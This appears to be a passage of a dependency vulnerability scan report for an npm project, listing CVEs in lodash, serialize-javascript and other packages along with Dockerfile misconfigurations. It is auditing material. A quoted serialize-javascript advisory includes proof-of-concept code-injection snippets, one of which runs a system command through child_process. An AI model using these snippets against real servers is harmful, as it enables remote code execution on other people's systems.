Critical
High
Medium
Low
Secrets
Misconfig
| Severity | CVE ID | Package | Installed | Fixed In | Description |
|---|---|---|---|---|---|
| HIGH | CVE-2020-8203 | lodash | 4.17.14 | 4.17.19 | nodejs-lodash: prototype pollution in zipObjectDeep function |
| HIGH | CVE-2021-23337 | lodash | 4.17.14 | 4.17.21 | nodejs-lodash: command injection via template |
| HIGH | CVE-2026-4800 | lodash | 4.17.14 | 4.18.0 | lodash: lodash: Arbitrary code execution via untrusted input in template imports |
| MEDIUM | CVE-2020-28500 | lodash | 4.17.14 | 4.17.21 | nodejs-lodash: ReDoS via the toNumber, trim and trimEnd functions |
| MEDIUM | CVE-2025-13465 | lodash | 4.17.14 | 4.17.23 | lodash: prototype pollution in _.unset and _.omit functions |
| MEDIUM | CVE-2026-2950 | lodash | 4.17.14 | 4.18.0 | Impact: Lodash versions 4.17.23 and earlier are vulnerable to prototy ... |
| HIGH | CVE-2021-3803 | nth-check | 1.0.2 | 2.0.1 | nodejs-nth-check: inefficient regular expression complexity |
| MEDIUM | CVE-2023-44270 | postcss | 7.0.39 | 8.4.31 | PostCSS: Improper input validation in PostCSS |
| MEDIUM | CVE-2021-3163 | quill | 1.3.7 | No fix | Cross-site Scripting in quill |
| HIGH | GHSA-5c6j-r48x-rmvq | serialize-javascript | 4.0.0 | 7.0.3 | Serialize JavaScript is Vulnerable to RCE via RegExp.flags and Date.prototype.toISOString() |
| MEDIUM | CVE-2026-34043 | serialize-javascript | 4.0.0 | 7.0.5 | serialize-javascript: serialize-javascript: Denial of Service via specially crafted array-like objec |
| HIGH | GHSA-5c6j-r48x-rmvq | serialize-javascript | 6.0.2 | 7.0.3 | Serialize JavaScript is Vulnerable to RCE via RegExp.flags and Date.prototype.toISOString() |
| MEDIUM | CVE-2026-34043 | serialize-javascript | 6.0.2 | 7.0.5 | serialize-javascript: serialize-javascript: Denial of Service via specially crafted array-like objec |
| HIGH | CVE-2026-27601 | underscore | 1.13.6 | 1.13.8 | Underscore.js: Underscore.js: Denial of Service via recursive data structures in flatten and isEqual |
| MEDIUM | CVE-2025-30359 | webpack-dev-server | 4.15.2 | 5.2.1 | webpack-dev-server: webpack-dev-server information exposure |
| MEDIUM | CVE-2025-30360 | webpack-dev-server | 4.15.2 | 5.2.1 | webpack-dev-server: webpack-dev-server information exposure |
| Type | File | Line | Match |
|---|---|---|---|
| ✅ No secrets found | |||
| Severity | ID | Check | File | Message |
|---|---|---|---|---|
| HIGH | DS002 | Image user should not be 'root' | Dockerfile | Specify at least 1 USER command in Dockerfile with non-root user as argument |
| MEDIUM | DS001 | ':latest' tag used | node_modules/@surma/rollup-plugin-off-main-thread/Dockerfile | Specify a tag in the 'FROM' statement for image 'selenium/node-chrome' |
| HIGH | DS002 | Image user should not be 'root' | node_modules/@surma/rollup-plugin-off-main-thread/Dockerfile | Last USER command in Dockerfile should not be 'root' |
| HIGH | DS017 | 'RUN |
node_modules/@surma/rollup-plugin-off-main-thread/Dockerfile | The instruction 'RUN |
| HIGH | DS002 | Image user should not be 'root' | node_modules/jsonpath/Dockerfile | Specify at least 1 USER command in Dockerfile with non-root user as argument |
{
"SchemaVersion": 2,
"CreatedAt": "2026-04-13T06:28:25.695638897Z",
"ArtifactName": "/src",
"ArtifactType": "filesystem",
"Metadata": {
"ImageConfig": {
"architecture": "",
"created": "0001-01-01T00:00:00Z",
"os": "",
"rootfs": {
"type": "",
"diff_ids": null
},
"config": {}
}
},
"Results": [
{
"Target": "package-lock.json",
"Class": "lang-pkgs",
"Type": "npm",
"Vulnerabilities": [
{
"VulnerabilityID": "CVE-2020-8203",
"PkgID": "lodash@4.17.14",
"PkgName": "lodash",
"PkgIdentifier": {
"PURL": "pkg:npm/lodash@4.17.14"
},
"InstalledVersion": "4.17.14",
"FixedVersion": "4.17.19",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2020-8203",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory npm",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm"
},
"Title": "nodejs-lodash: prototype pollution in zipObjectDeep function",
"Description": "Prototype pollution attack when using _.zipObjectDeep in lodash before 4.17.20.",
"Severity": "HIGH",
"CweIDs": [
"CWE-770",
"CWE-1321"
],
"VendorSeverity": {
"ghsa": 3,
"nvd": 3,
"redhat": 2,
"ruby-advisory-db": 3
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H",
"V3Score": 7.4
},
"nvd": {
"V2Vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P",
"V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H",
"V2Score": 5.8,
"V3Score": 7.4
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H",
"V3Score": 7.4
}
},
"References": [
"https://access.redhat.com/security/cve/CVE-2020-8203",
"https://github.com/advisories/GHSA-p6mc-m468-83gw",
"https://github.com/github/advisory-database/pull/2884",
"https://github.com/lodash/lodash",
"https://github.com/lodash/lodash/commit/c84fe82760fb2d3e03a63379b297a1cc1a2fce12",
"https://github.com/lodash/lodash/issues/4744",
"https://github.com/lodash/lodash/issues/4874",
"https://github.com/lodash/lodash/wiki/Changelog#v41719",
"https://github.com/rubysec/ruby-advisory-db/blob/master/gems/lodash-rails/CVE-2020-8203.yml",
"https://hackerone.com/reports/712065",
"https://hackerone.com/reports/864701",
"https://nvd.nist.gov/vuln/detail/CVE-2020-8203",
"https://security.netapp.com/advisory/ntap-20200724-0006",
"https://security.netapp.com/advisory/ntap-20200724-0006/",
"https://web.archive.org/web/20210914001339/https://github.com/lodash/lodash/issues/4744",
"https://www.cve.org/CVERecord?id=CVE-2020-8203",
"https://www.npmjs.com/advisories/1523",
"https://www.oracle.com//security-alerts/cpujul2021.html",
"https://www.oracle.com/security-alerts/cpuApr2021.html",
"https://www.oracle.com/security-alerts/cpuapr2022.html",
"https://www.oracle.com/security-alerts/cpujan2022.html",
"https://www.oracle.com/security-alerts/cpuoct2021.html"
],
"PublishedDate": "2020-07-15T17:15:11.797Z",
"LastModifiedDate": "2024-11-21T05:38:29.79Z"
},
{
"VulnerabilityID": "CVE-2021-23337",
"PkgID": "lodash@4.17.14",
"PkgName": "lodash",
"PkgIdentifier": {
"PURL": "pkg:npm/lodash@4.17.14"
},
"InstalledVersion": "4.17.14",
"FixedVersion": "4.17.21",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2021-23337",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory npm",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm"
},
"Title": "nodejs-lodash: command injection via template",
"Description": "Lodash versions prior to 4.17.21 are vulnerable to Command Injection via the template function.",
"Severity": "HIGH",
"CweIDs": [
"CWE-94"
],
"VendorSeverity": {
"ghsa": 3,
"nvd": 3,
"redhat": 2,
"ruby-advisory-db": 3,
"ubuntu": 2
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"V3Score": 7.2
},
"nvd": {
"V2Vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"V2Score": 6.5,
"V3Score": 7.2
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"V3Score": 7.2
}
},
"References": [
"https://access.redhat.com/security/cve/CVE-2021-23337",
"https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf",
"https://github.com/advisories/GHSA-35jh-r3h4-6jhm",
"https://github.com/lodash/lodash",
"https://github.com/lodash/lodash/blob/ddfd9b11a0126db2302cb70ec9973b66baec0975/lodash.js",
"https://github.com/lodash/lodash/blob/ddfd9b11a0126db2302cb70ec9973b66baec0975/lodash.js#L14851",
"https://github.com/lodash/lodash/blob/ddfd9b11a0126db2302cb70ec9973b66baec0975/lodash.js%23L14851",
"https://github.com/lodash/lodash/commit/3469357cff396a26c363f8c1b5a91dde28ba4b1c",
"https://github.com/rubysec/ruby-advisory-db/blob/master/gems/lodash-rails/CVE-2021-23337.yml",
"https://nvd.nist.gov/vuln/detail/CVE-2021-23337",
"https://security.netapp.com/advisory/ntap-20210312-0006",
"https://security.netapp.com/advisory/ntap-20210312-0006/",
"https://snyk.io/vuln/SNYK-JAVA-ORGFUJIONWEBJARS-1074932",
"https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-1074930",
"https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1074928",
"https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBLODASH-1074931",
"https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1074929",
"https://snyk.io/vuln/SNYK-JS-LODASH-1040724",
"https://www.cve.org/CVERecord?id=CVE-2021-23337",
"https://www.oracle.com//security-alerts/cpujul2021.html",
"https://www.oracle.com/security-alerts/cpujan2022.html",
"https://www.oracle.com/security-alerts/cpujul2022.html",
"https://www.oracle.com/security-alerts/cpuoct2021.html"
],
"PublishedDate": "2021-02-15T13:15:12.56Z",
"LastModifiedDate": "2024-11-21T05:51:31.643Z"
},
{
"VulnerabilityID": "CVE-2026-4800",
"PkgID": "lodash@4.17.14",
"PkgName": "lodash",
"PkgIdentifier": {
"PURL": "pkg:npm/lodash@4.17.14"
},
"InstalledVersion": "4.17.14",
"FixedVersion": "4.18.0",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-4800",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory npm",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm"
},
"Title": "lodash: lodash: Arbitrary code execution via untrusted input in template imports",
"Description": "Impact:\n\nThe fix for CVE-2021-23337 (https://github.com/advisories/GHSA-35jh-r3h4-6jhm) added validation for the variable option in _.template but did not apply the same validation to options.imports key names. Both paths flow into the same Function() constructor sink.\n\nWhen an application passes untrusted input as options.imports key names, an attacker can inject default-parameter expressions that execute arbitrary code at template compilation time.\n\nAdditionally, _.template uses assignInWith to merge imports, which enumerates inherited properties via for..in. If Object.prototype has been polluted by any other vector, the polluted keys are copied into the imports object and passed to Function().\n\nPatches:\n\nUsers should upgrade to version 4.18.0.\n\nWorkarounds:\n\nDo not pass untrusted input as key names in options.imports. Only use developer-controlled, static key names.",
"Severity": "HIGH",
"CweIDs": [
"CWE-94"
],
"VendorSeverity": {
"ghsa": 3,
"nvd": 4,
"redhat": 3
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"V3Score": 8.1
},
"nvd": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"V3Score": 9.8
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"V3Score": 8.1
}
},
"References": [
"https://access.redhat.com/security/cve/CVE-2026-4800",
"https://cna.openjsf.org/security-advisories.html",
"https://github.com/advisories/GHSA-35jh-r3h4-6jhm",
"https://github.com/lodash/lodash",
"https://github.com/lodash/lodash/commit/3469357cff396a26c363f8c1b5a91dde28ba4b1c",
"https://github.com/lodash/lodash/security/advisories/GHSA-r5fr-rjxr-66jc",
"https://nvd.nist.gov/vuln/detail/CVE-2026-4800",
"https://www.cve.org/CVERecord?id=CVE-2026-4800"
],
"PublishedDate": "2026-03-31T20:16:29.66Z",
"LastModifiedDate": "2026-04-07T15:43:13.197Z"
},
{
"VulnerabilityID": "CVE-2020-28500",
"PkgID": "lodash@4.17.14",
"PkgName": "lodash",
"PkgIdentifier": {
"PURL": "pkg:npm/lodash@4.17.14"
},
"InstalledVersion": "4.17.14",
"FixedVersion": "4.17.21",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2020-28500",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory npm",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm"
},
"Title": "nodejs-lodash: ReDoS via the toNumber, trim and trimEnd functions",
"Description": "Lodash versions prior to 4.17.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the toNumber, trim and trimEnd functions.",
"Severity": "MEDIUM",
"VendorSeverity": {
"ghsa": 2,
"nvd": 2,
"redhat": 2,
"ruby-advisory-db": 2,
"ubuntu": 2
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"V3Score": 5.3
},
"nvd": {
"V2Vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"V2Score": 5,
"V3Score": 5.3
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"V3Score": 5.3
}
},
"References": [
"https://access.redhat.com/security/cve/CVE-2020-28500",
"https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf",
"https://github.com/advisories/GHSA-29mw-wpgm-hmr9",
"https://github.com/github/advisory-database/pull/6139",
"https://github.com/lodash/lodash",
"https://github.com/lodash/lodash/blob/npm/trimEnd.js",
"https://github.com/lodash/lodash/blob/npm/trimEnd.js#L8",
"https://github.com/lodash/lodash/blob/npm/trimEnd.js%23L8",
"https://github.com/lodash/lodash/commit/c4847ebe7d14540bb28a8b932a9ce1b9ecbfee1a",
"https://github.com/lodash/lodash/pull/5065",
"https://github.com/lodash/lodash/pull/5065/commits/02906b8191d3c100c193fe6f7b27d1c40f200bb7",
"https://github.com/rubysec/ruby-advisory-db/blob/master/gems/lodash-rails/CVE-2020-28500.yml",
"https://nvd.nist.gov/vuln/detail/CVE-2020-28500",
"https://security.netapp.com/advisory/ntap-20210312-0006",
"https://security.netapp.com/advisory/ntap-20210312-0006/",
"https://snyk.io/vuln/SNYK-JAVA-ORGFUJIONWEBJARS-1074896",
"https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-1074894",
"https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1074892",
"https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBLODASH-1074895",
"https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1074893",
"https://snyk.io/vuln/SNYK-JS-LODASH-1018905",
"https://www.cve.org/CVERecord?id=CVE-2020-28500",
"https://www.oracle.com//security-alerts/cpujul2021.html",
"https://www.oracle.com/security-alerts/cpujan2022.html",
"https://www.oracle.com/security-alerts/cpujul2022.html",
"https://www.oracle.com/security-alerts/cpuoct2021.html"
],
"PublishedDate": "2021-02-15T11:15:12.397Z",
"LastModifiedDate": "2024-11-21T05:22:55.053Z"
},
{
"VulnerabilityID": "CVE-2025-13465",
"PkgID": "lodash@4.17.14",
"PkgName": "lodash",
"PkgIdentifier": {
"PURL": "pkg:npm/lodash@4.17.14"
},
"InstalledVersion": "4.17.14",
"FixedVersion": "4.17.23",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-13465",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory npm",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm"
},
"Title": "lodash: prototype pollution in _.unset and _.omit functions",
"Description": "Lodash versions 4.0.0 through 4.17.22 are vulnerable to prototype pollution in the _.unset\u00a0and _.omit\u00a0functions. An attacker can pass crafted paths which cause Lodash to delete methods from global prototypes.\n\nThe issue permits deletion of properties but does not allow overwriting their original behavior.\n\nThis issue is patched on 4.17.23",
"Severity": "MEDIUM",
"CweIDs": [
"CWE-1321"
],
"VendorSeverity": {
"alma": 3,
"ghsa": 2,
"nvd": 2,
"oracle-oval": 3,
"redhat": 3
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L",
"V3Score": 6.5
},
"nvd": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"V3Score": 5.3
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H",
"V3Score": 8.2
}
},
"References": [
"https://access.redhat.com/errata/RHSA-2026:2452",
"https://access.redhat.com/security/cve/CVE-2025-13465",
"https://bugzilla.redhat.com/2431740",
"https://errata.almalinux.org/9/ALSA-2026-2452.html",
"https://github.com/lodash/lodash",
"https://github.com/lodash/lodash/commit/edadd452146f7e4bad4ea684e955708931d84d81",
"https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg",
"https://linux.oracle.com/cve/CVE-2025-13465.html",
"https://linux.oracle.com/errata/ELSA-2026-2452.html",
"https://nvd.nist.gov/vuln/detail/CVE-2025-13465",
"https://www.cve.org/CVERecord?id=CVE-2025-13465"
],
"PublishedDate": "2026-01-21T20:16:05.25Z",
"LastModifiedDate": "2026-02-17T17:10:07.52Z"
},
{
"VulnerabilityID": "CVE-2026-2950",
"PkgID": "lodash@4.17.14",
"PkgName": "lodash",
"PkgIdentifier": {
"PURL": "pkg:npm/lodash@4.17.14"
},
"InstalledVersion": "4.17.14",
"FixedVersion": "4.18.0",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-2950",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory npm",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm"
},
"Title": "Impact: Lodash versions 4.17.23 and earlier are vulnerable to prototy ...",
"Description": "Impact:\n\nLodash versions 4.17.23 and earlier are vulnerable to prototype pollution in the _.unset and _.omit functions. The fix for (CVE-2025-13465: https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg) only guards against string key members, so an attacker can bypass the check by passing array-wrapped path segments. This allows deletion of properties from built-in prototypes such as Object.prototype, Number.prototype, and String.prototype.\n\nThe issue permits deletion of prototype properties but does not allow overwriting their original behavior.\n\nPatches:\n\nThis issue is patched in 4.18.0.\n\nWorkarounds:\n\nNone. Upgrade to the patched version.",
"Severity": "MEDIUM",
"CweIDs": [
"CWE-1321"
],
"VendorSeverity": {
"ghsa": 2,
"nvd": 2
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L",
"V3Score": 6.5
},
"nvd": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"V3Score": 5.3
}
},
"References": [
"https://github.com/lodash/lodash",
"https://github.com/lodash/lodash/security/advisories/GHSA-f23m-r3pf-42rh",
"https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg",
"https://nvd.nist.gov/vuln/detail/CVE-2026-2950"
],
"PublishedDate": "2026-03-31T20:16:26.207Z",
"LastModifiedDate": "2026-04-07T16:12:25.97Z"
},
{
"VulnerabilityID": "CVE-2021-3803",
"PkgID": "nth-check@1.0.2",
"PkgName": "nth-check",
"PkgIdentifier": {
"PURL": "pkg:npm/nth-check@1.0.2"
},
"InstalledVersion": "1.0.2",
"FixedVersion": "2.0.1",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2021-3803",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory npm",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm"
},
"Title": "nodejs-nth-check: inefficient regular expression complexity",
"Description": "nth-check is vulnerable to Inefficient Regular Expression Complexity",
"Severity": "HIGH",
"CweIDs": [
"CWE-1333"
],
"VendorSeverity": {
"ghsa": 3,
"nvd": 3,
"redhat": 2,
"ubuntu": 2
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 7.5
},
"nvd": {
"V2Vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V2Score": 5,
"V3Score": 7.5
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"V3Score": 7.5
}
},
"References": [
"https://access.redhat.com/security/cve/CVE-2021-3803",
"https://github.com/advisories/GHSA-rp65-9cf3-cjxr",
"https://github.com/fb55/nth-check",
"https://github.com/fb55/nth-check/commit/9894c1d2010870c351f66c6f6efcf656e26bb726",
"https://github.com/fb55/nth-check/commit/9894c1d2010870c351f66c6f6efcf656e26bb726 (v2.0.1)",
"https://huntr.dev/bounties/8cf8cc06-d2cf-4b4e-b42c-99fafb0b04d0",
"https://huntr.dev/bounties/8cf8cc06-d2cf-4b4e-b42c-99fafb0b04d0/",
"https://lists.debian.org/debian-lts-announce/2023/05/msg00023.html",
"https://nvd.nist.gov/vuln/detail/CVE-2021-3803",
"https://ubuntu.com/security/notices/USN-6114-1",
"https://www.cve.org/CVERecord?id=CVE-2021-3803"
],
"PublishedDate": "2021-09-17T07:15:09.153Z",
"LastModifiedDate": "2024-11-21T06:22:28.873Z"
},
{
"VulnerabilityID": "CVE-2023-44270",
"PkgID": "postcss@7.0.39",
"PkgName": "postcss",
"PkgIdentifier": {
"PURL": "pkg:npm/postcss@7.0.39"
},
"InstalledVersion": "7.0.39",
"FixedVersion": "8.4.31",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2023-44270",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory npm",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm"
},
"Title": "PostCSS: Improper input validation in PostCSS",
"Description": "An issue was discovered in PostCSS before 8.4.31. The vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being included in a comment.",
"Severity": "MEDIUM",
"CweIDs": [
"CWE-74"
],
"VendorSeverity": {
"ghsa": 2,
"nvd": 2,
"redhat": 2
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"V3Score": 5.3
},
"nvd": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"V3Score": 5.3
},
"redhat": {
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"V3Score": 5.3
}
},
"References": [
"https://access.redhat.com/security/cve/CVE-2023-44270",
"https://github.com/github/advisory-database/issues/2820",
"https://github.com/postcss/postcss",
"https://github.com/postcss/postcss/blob/main/lib/tokenize.js#L25",
"https://github.com/postcss/postcss/commit/58cc860b4c1707510c9cd1bc1fa30b423a9ad6c5",
"https://github.com/postcss/postcss/releases/tag/8.4.31",
"https://lists.debian.org/debian-lts-announce/2024/12/msg00025.html",
"https://nvd.nist.gov/vuln/detail/CVE-2023-44270",
"https://www.cve.org/CVERecord?id=CVE-2023-44270"
],
"PublishedDate": "2023-09-29T22:15:11.867Z",
"LastModifiedDate": "2025-11-03T22:16:27.913Z"
},
{
"VulnerabilityID": "CVE-2021-3163",
"PkgID": "quill@1.3.7",
"PkgName": "quill",
"PkgIdentifier": {
"PURL": "pkg:npm/quill@1.3.7"
},
"InstalledVersion": "1.3.7",
"Status": "affected",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://avd.aquasec.com/nvd/cve-2021-3163",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory npm",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm"
},
"Title": "Cross-site Scripting in quill",
"Description": "A vulnerability in the HTML editor of Slab Quill 4.8.0 allows an attacker to execute arbitrary JavaScript by storing an XSS payload (a crafted onloadstart attribute of an IMG element) in a text field. Note: Researchers have claimed that this issue is not within the product itself, but is intended behavior in a web browser",
"Severity": "MEDIUM",
"CweIDs": [
"CWE-79"
],
"VendorSeverity": {
"ghsa": 2,
"nvd": 2
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N",
"V3Score": 4.2
},
"nvd": {
"V2Vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"V2Score": 4.3,
"V3Score": 6.1
}
},
"References": [
"https://burninatorsec.blogspot.com/2021/04/cve-2021-3163-xss-slab-quill-js.html",
"https://github.com/quilljs/quill",
"https://github.com/quilljs/quill/issues/3273",
"https://github.com/quilljs/quill/issues/3359",
"https://github.com/quilljs/quill/issues/3364",
"https://nvd.nist.gov/vuln/detail/CVE-2021-3163",
"https://quilljs.com"
],
"PublishedDate": "2021-04-12T21:15:14.34Z",
"LastModifiedDate": "2024-11-21T06:21:02.183Z"
},
{
"VulnerabilityID": "GHSA-5c6j-r48x-rmvq",
"PkgID": "serialize-javascript@4.0.0",
"PkgName": "serialize-javascript",
"PkgIdentifier": {
"PURL": "pkg:npm/serialize-javascript@4.0.0"
},
"InstalledVersion": "4.0.0",
"FixedVersion": "7.0.3",
"Status": "fixed",
"Layer": {},
"SeveritySource": "ghsa",
"PrimaryURL": "https://github.com/advisories/GHSA-5c6j-r48x-rmvq",
"DataSource": {
"ID": "ghsa",
"Name": "GitHub Security Advisory npm",
"URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm"
},
"Title": "Serialize JavaScript is Vulnerable to RCE via RegExp.flags and Date.prototype.toISOString()",
"Description": "### Impact\n\nThe serialize-javascript npm package (versions <= 7.0.2) contains a code injection vulnerability. It is an incomplete fix for CVE-2020-7660.\n\nWhile `RegExp.source` is sanitized, `RegExp.flags` is interpolated directly into the generated output without escaping. A similar issue exists in `Date.prototype.toISOString()`.\n\nIf an attacker can control the input object passed to `serialize()`, they can inject malicious JavaScript via the flags property of a RegExp object. When the serialized string is later evaluated (via `eval`, `new Function`, or `<script>` tags), the injected code executes.\n\n```javascript\nconst serialize = require('serialize-javascript');\n// Create an object that passes instanceof RegExp with a spoofed .flags\nconst fakeRegex = Object.create(RegExp.prototype);\nObject.defineProperty(fakeRegex, 'source', { get: () => 'x' });\nObject.defineProperty(fakeRegex, 'flags', {\n get: () => '\"+(global.PWNED=\"CODE_INJECTION_VIA_FLAGS\")+\"'\n});\nfakeRegex.toJSON = function() { return '@placeholder'; };\nconst output = serialize({ re: fakeRegex });\n// Output: {\"re\":new RegExp(\"x\", \"\"+(global.PWNED=\"CODE_INJECTION_VIA_FLAGS\")+\"\")}\nlet obj;\neval('obj = ' + output);\nconsole.log(global.PWNED); // \"CODE_INJECTION_VIA_FLAGS\" \u2014 injected code executed!\n#h2. PoC 2: Code Injection via Date.toISOString()\n```\n\n```javascript\nconst serialize = require('serialize-javascript');\nconst fakeDate = Object.create(Date.prototype);\nfakeDate.toISOString = function() { return '\"+(global.DATE_PWNED=\"DATE_INJECTION\")+\"'; };\nfakeDate.toJSON = function() { return '2024-01-01'; };\nconst output = serialize({ d: fakeDate });\n// Output: {\"d\":new Date(\"\"+(global.DATE_PWNED=\"DATE_INJECTION\")+\"\")}\neval('obj = ' + output);\nconsole.log(global.DATE_PWNED); // \"DATE_INJECTION\" \u2014 injected code executed!\n#h2. PoC 3: Remote Code Execution\n```\n\n```javascript\nconst serialize = require('serialize-javascript');\nconst rceRegex = Object.create(RegExp.prototype);\nObject.defineProperty(rceRegex, 'source', { get: () => 'x' });\nObject.defineProperty(rceRegex, 'flags', {\n get: () => '\"+require(\"child_process\").execSync(\"id\").toString()+\"'\n});\nrceRegex.toJSON = function() { return '@rce'; };\nconst output = serialize({ re: rceRegex });\n// Output: {\"re\":new RegExp(\"x\", \"\"+require(\"child_process\").execSync(\"id\").toString()+\"\")}\n// When eval'd on a Node.js server, executes the \"id\" system command\n```\n\n### Patches\n\nThe fix has been published in version 7.0.3. https://github.com/yahoo/serialize-javascript/releases/tag/v7.0.3",
"Severity": "HIGH",
"VendorSeverity": {
"ghsa": 3
},
"CVSS": {
"ghsa": {
"V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"V3Score": 8.1
}
},
"References": [
"https://github.com/advisories/GHSA-hxcc-f52p-wc94",
"https://github.com/yahoo/serialize-javascript",
"https://github.com/yahoo/serialize-javascript/commit/2e609d0a9f4f5b097f0945af88bd45b9c7fb48d9",
"https://github.com/yahoo/serialize-javascript/releases/tag/v7.0.3",
"https://github.com/yahoo/serialize-javascript/security/advisories/GHSA-5c6j-r48x-rmvq",
"https://nvd.nist.gov/vuln/detail/CVE-2020-7660"
],
"PublishedDate": "2026-02-28T02:50:45Z",
"LastModifiedDate": "2026-03-02T16:17:35Z"
